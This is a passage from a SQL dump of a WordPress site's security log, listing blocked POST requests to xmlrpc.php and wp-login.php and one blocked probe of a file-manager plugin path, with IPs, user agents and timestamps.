Gecko\\/20100101 Firefox\\/96\"}','O2DtFEQbLriS4Ux0KNshC3IG',0,1665656498.0822,18834,'','POST',403,0,515,0,1,'',0),('103.171.180.165',1739306149,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VJsSLK9u6D5GCwZXWcBvbfrp',0,1665656623.7614,19102,'','POST',403,0,515,0,1,'',0),('146.148.44.185',2459184313,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','ipsjoCJwb9GcYLgNZT6B7EIP',0,1665656976.7634,17644,'','POST',403,0,600,0,1,'',0),('193.112.202.112',3245394544,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sFDiqXMedot5rwN7C1vPy92W',0,1665657036.1223,20309,'','POST',403,0,515,0,1,'',0),('62.102.148.187',1046910139,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','1a2Dh4R0mPbNVq73KHOdpcts',0,1665657121.0913,11904,'','POST',403,0,515,0,1,'',0),('190.169.30.9',3198754313,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mQ2cLXUYFdye6Kg0t8DCJ4EP',0,1665657208.7918,18638,'','POST',403,0,515,0,1,'',0),('128.199.109.135',2160553351,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kGPtiu4AK2oFVyzsMUljCvXE',0,1665657714.7298,18247,'','POST',403,0,515,0,1,'',0),('66.29.138.73',1109232201,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','r9LoNKS6ciFVxdI3UX4sGvk8',0,1665658156.0572,2900,'','POST',403,0,515,0,1,'',0),('162.144.49.214',2727358934,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sQGHCx07v3KjMUAYaqWJ92tB',0,1665658285.5553,18217,'','POST',403,0,515,0,1,'',0),('138.68.180.230',2319758566,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','98ETQqd1cH3kb6hItPRKXm4p',0,1665658366.8283,10222,'','POST',403,0,600,0,1,'',0),('51.159.105.232',866085352,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','L8qjXok1aSh3BVTrdEKc5pwM',0,1665658693.0695,18777,'','POST',403,0,515,0,1,'',0),('134.209.222.89',2261900889,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','xgcB9ukXTyWKlHNE1fR6t7eh',0,1665659724.7983,509,'','POST',403,0,515,0,1,'',0),('183.90.250.15',3076192783,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','jFoH5RS4ZGCTDi2qpngukX0r',0,1665659731.0428,537,'','POST',403,0,515,0,1,'',0),('62.3.41.108',1040394604,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','7jAFb0JVIYLkMDt8l1uXNa2T',0,1665659736.7680,610,'','POST',403,0,515,0,1,'',0),('91.134.248.245',1535572213,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','drOeBucLP2vJFhzSkxpR98qf',0,1665659742.5469,740,'','POST',403,0,515,0,1,'',0),('93.186.242.173',1572532909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','cTB01XAe4NZECLdWDsjY35vk',0,1665659743.3369,627,'','POST',403,0,515,0,1,'',0),('103.27.60.66',1729838146,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','cM42ClLvk5sPTw3zqotfdeJj',0,1665659747.3898,1394,'','POST',403,0,515,0,1,'',0),('51.79.207.190',860868542,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','1VQEMbg0TYsr4iCHXjftA5zn',0,1665659752.2644,558,'','POST',403,0,515,0,1,'',0),('121.78.79.85',2035175253,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','9AwL8JkyCYi2G4TqNR60PgeI',0,1665659757.6346,699,'','POST',403,0,515,0,1,'',0),('119.28.78.249',1998343929,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','veUQK9ubHZLoDNxAnf2dz1O4',0,1665659759.2549,651,'','POST',403,0,515,0,1,'',0),('49.12.114.46',822899246,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','94wUfARQWKEYT0BIyhaSsojO',0,1665659764.8888,521,'','POST',403,0,515,0,1,'',0),('159.223.170.181',2682235573,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','O3s4roqX6mxzFSJWjtgdHiu0',0,1665659774.2164,573,'','POST',403,0,600,0,1,'',0),('167.114.64.93',2809282653,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','pcWAXVtHOhv9KGmaIYi8bsgP',0,1665659776.9526,669,'','POST',403,0,515,0,1,'',0),('66.175.217.71',1118820679,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4gUxcjBTKLnXR2irDmvf7YaH',0,1665660053.9298,19142,'','POST',403,0,515,0,1,'',0),('151.80.20.26',2538607642,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7eUvnAKQHWz3RPf5h4gNTayl',0,1665660698.2468,18775,'','POST',403,0,515,0,1,'',0),('72.9.145.140',1208586636,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hT8eqyzxBbkI57CPR6DNOgQr',0,1665660826.3776,18859,'','POST',403,0,515,0,1,'',0),('46.105.29.21',778640661,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','bIfLcpjT7GXJMz9S8qHmKu1o',0,1665661183.4796,18254,'','POST',403,0,600,0,1,'',0),('162.241.115.107',2733732715,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Rj9lenIsY3Lazv5MAXQbPWxk',0,1665661264.2533,2537,'','POST',403,0,515,0,1,'',0),('103.35.64.73',1730363465,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wQunXaBf0RyLg1Kz7WxE46NV',0,1665661844.4323,2578,'','POST',403,0,515,0,1,'',0),('188.212.34.36',3168018980,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Wd31DCfNSYms58e9RIbHjc6t',0,1665661987.8927,8854,'','POST',403,0,515,0,1,'',0),('184.75.223.203',3091980235,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','mjUBuCrG3EyhFoKXnfLtDgJ0',0,1665662002.2313,532,'','POST',403,0,515,0,1,'',0),('67.222.142.146',1138658962,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','n4YmvKVeGqojQApyMDU6x7Wg',0,1665662421.9242,11111,'','POST',403,0,515,0,1,'',0),('23.235.194.70',401326662,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','erBm3d28FY4gGAZ1UwqO0HK7',0,1665662419.8811,13157,'','POST',403,0,515,0,1,'',0),('72.167.51.34',1218917154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','UZvY1MLtxCRdjzTqPFrNaXnG',0,1665662419.6902,13349,'','POST',403,0,515,0,1,'',0),('93.186.242.173',1572532909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','UHbzCSVKOy28f63FQDIq9LEm',0,1665662415.7864,17447,'','POST',403,0,515,0,1,'',0),('67.227.237.232',1139011048,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','hMW6yclOEdusv4R0bt1x7qVa',0,1665665100.6179,498,'','POST',403,0,515,0,1,'',0),('51.13.81.56',856510776,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','bnikS7myv4soYQ3pX5x9wHzl',0,1665665121.0933,1783,'','POST',403,0,515,0,1,'',0),('123.31.21.26',2065634586,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Jpk7H6KU0TWPineoMzL1dhst',0,1665665406.8622,2095,'','POST',403,0,515,0,1,'',0),('146.59.243.31',2453402399,'','http://cteisys.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','KpkSruo4JeNb5QGWRFgi7j0E',0,1665665547.9283,2929,'','GET',403,0,700,0,1,'',0),('173.212.197.26',2916402458,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','V1XtzqoD2pQfy3FJ8OnYvGL0',0,1665665566.4290,2332,'','POST',403,0,515,0,1,'',0),('208.88.73.86',3495446870,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','sipOD8MXFYuNcCbwJP7nr562',0,1665665845.5492,17727,'','POST',403,0,515,0,1,'',0),('103.110.86.9',1735284233,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','PHgtNO3Iyjlx6dR5SKnovrp0',0,1665665847.4442,15836,'','POST',403,0,515,0,1,'',0),('103.27.60.66',1729838146,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','OuoKEfvmTG3q6VYD8XQCd7Hn',0,1665665848.5352,14848,'','POST',403,0,515,0,1,'',0),('90.156.169.18',1520216338,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','h37dXaAgxV9srNRIJMvKmntE',0,1665665866.1068,1691,'','POST',403,0,515,0,1,'',0),('208.77.159.5',3494747909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','aN2nw8l30QBGxTo7MKqLv5WO',0,1665665867.5326,796,'','POST',403,0,515,0,1,'',0),('208.88.73.86',3495446870,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','da4IpUwQxOeCEWfP8jTSbkhY',0,1665665871.2915,516,'','POST',403,0,515,0,1,'',0),('49.12.114.46',822899246,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','aHg1N4Xn3quGeBsdmIVWtLxR',0,1665665878.5389,1398,'','POST',403,0,515,0,1,'',0),('52.26.178.66',874164802,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','BvLMnKt4OmEs6gwC8NVGuqjA',0,1665665885.5256,612,'','POST',403,0,515,0,1,'',0),('150.230.247.143',2531719055,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ir9oMkjA5Sx1Xme4ERqBUFfb',0,1665668304.4511,19170,'','POST',403,0,515,0,1,'',0),('107.180.103.185',1806985145,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','McjWTu6vL701xZglYeIBsQo3',0,1665668928.5494,18699,'','POST',403,0,515,0,1,'',0),('42.200.109.156',717778332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','J3eUIGcpAVkmEd2NCbzsQxur',0,1665669061.7211,14273,'','POST',403,0,515,0,1,'',0),('198.12.125.130',3322707330,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','AHxJie2PMqGU51Ta7bVsQftj',0,1665672440.5076,1234,'','POST',403,0,515,0,1,'',0),('182.18.144.189',3054670013,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','AuqK6nXbIEcfmo4GrUO189Fx',0,1665672441.4314,909,'','POST',403,0,515,0,1,'',0),('195.5.116.247',3271914743,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','bnZwxFCOh09zqRtWI7Ve1Yfg',0,1665672452.9975,652,'','POST',403,0,515,0,1,'',0),('139.59.127.114',2335932274,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','VXE5yl8R30DreqOoxZQzbIpt',0,1665672457.2340,473,'','POST',403,0,515,0,1,'',0),('68.183.22.104',1152849512,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','WjSpZLleQRuCMBgyK1xz6ms7',0,1665677422.0558,1478,'','POST',403,0,515,0,1,'',0),('93.186.242.173',1572532909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','FBtjngO42fJsqCEVh3ZQvDTp',0,1665677439.6857,565,'','POST',403,0,515,0,1,'',0),('81.88.52.221',1364735197,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','dRf2BmVSQuUt5jJiaA3k0xNs',0,1665678488.8608,18201,'','POST',403,0,600,0,1,'',0),('54.36.182.160',908375712,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','KykAeMjVXdZNtUCJRfmBiPHx',0,1665679370.9604,18398,'','POST',403,0,600,0,1,'',0),('34.78.198.205',575588045,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','IZkVu3CsTlb0gJj5AEiFGYhr',0,1665681757.7871,17362,'','POST',403,0,600,0,1,'',0),('154.197.48.10',2596614154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','HzJkC4p8wiEosT0ePnhOxKqX',0,1665682831.3925,15663,'','POST',403,0,515,0,1,'',0),('82.165.86.28',1386567196,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','KlaEN8y6hfO4er97IbGFYxQM',0,1665682828.8493,18260,'','POST',403,0,515,0,1,'',0),('198.38.88.250',3324401914,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','Z28clW49Q7wGtFETHLeI6KR0',0,1665682832.0991,15208,'','POST',403,0,515,0,1,'',0),('49.12.114.46',822899246,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','XNYd2ywecRmao40lWnPKJ86u',0,1665682856.1513,556,'','POST',403,0,515,0,1,'',0),('91.134.248.249',1535572217,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','xlvImYw87FhJ0unAXObKMB1C',0,1665682856.8976,536,'','POST',403,0,515,0,1,'',0),('82.165.81.72',1386565960,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','Let5hlUR3I1PB4YyGdqC6SpN',0,1665682863.0029,513,'','POST',403,0,515,0,1,'',0),('31.184.215.230',532207590,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','Bo2m3vaZyJi7GejXMCtUAgx1',0,1665682869.3942,577,'','POST',403,0,515,0,1,'',0),('103.27.60.66',1729838146,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','sRpKj5J9mPOwyzXLT3Q0Itfr',0,1665682873.9089,541,'','POST',403,0,515,0,1,'',0),('185.51.188.22',3107175446,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','qcz9P8DLdE62rZCeXvmBMKIf',0,1665682874.8659,510,'','POST',403,0,515,0,1,'',0),('34.145.125.175',579960239,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','OMpKQebAz3mDxFvZa4YE6huH',0,1665682880.8063,539,'','POST',403,0,515,0,1,'',0),('72.52.186.8',1211415048,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','ou6yVCeJ5AEGPT4rHhjU80FY',0,1665682884.0894,497,'','POST',403,0,515,0,1,'',0),('115.78.160.53',1934532661,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','qHi7hwCXY2cDuPLMj5WlNSra',0,1665682898.4823,519,'','POST',403,0,515,0,1,'',0),('47.114.72.18',796018706,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','l8BH9szhwfJOivy2mAnqp5oC',0,1665683211.7982,13547,'','POST',403,0,600,0,1,'',0),('67.225.161.250',1138860538,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','9phTtJW1c7a2zjb80Rd3sS4Q',0,1665687068.2537,553,'','POST',403,0,515,0,1,'',0),('193.70.114.151',3242619543,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','lzsom8t7NiXLS60PGEQYDapr',0,1665687080.4821,526,'','POST',403,0,515,0,1,'',0),('59.106.13.177',996806065,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','xya4H9bG8c2zYwU0fVJpXkKq',0,1665687083.0854,537,'','POST',403,0,515,0,1,'',0),('34.145.125.175',579960239,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','drDyMVTWqslEYhL7b9QejzFB',0,1665687094.7906,909,'','POST',403,0,515,0,1,'',0),('208.88.73.86',3495446870,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','5mOWZSiP6EIFQ3A2nDdgVpoU',0,1665687095.3073,781,'','POST',403,0,515,0,1,'',0),('139.59.127.114',2335932274,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','nsWRoKtM7NzCODYZVu9r4qjL',0,1665687573.0021,3288,'','POST',403,0,515,0,1,'',0),('68.183.22.104',1152849512,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','0Capfce8mbt3wiX4YFqrULvh',0,1665687576.3366,638,'','POST',403,0,515,0,1,'',0),('35.202.169.54',600484150,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','xtWOwK4DdcL73ZIfNaXSqGeM',0,1665687579.8493,496,'','POST',403,0,515,0,1,'',0),('49.12.114.46',822899246,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','qaWr3elOuCNk8dbEL1DTgJhm',0,1665687586.1751,1251,'','POST',403,0,515,0,1,'',0),('46.31.79.2',773803778,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','OBEJ1icpwvqbo4WMQNFnhP8K',0,1665688976.8219,543,'','POST',403,0,515,0,1,'',0),('94.73.146.148',1581879956,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','i9KUGfqcOvZ15nrwY0QEC7gH',0,1665688980.4605,1330,'','POST',403,0,515,0,1,'',0),('103.27.60.66',1729838146,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','elVTqrykntUPN98GxuJQoWmK',0,1665688990.7167,502,'','POST',403,0,515,0,1,'',0),('103.154.185.122',1738193274,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','kMsxG0h1jUnWy6oJbXcl4q78',0,1665689003.5443,624,'','POST',403,0,515,0,1,'',0),('123.56.247.161',2067330977,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','0R6Kzs781VZgrDHLqJlSOyGb',0,1665689007.5725,561,'','POST',403,0,515,0,1,'',0),('50.73.33.135',843653511,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 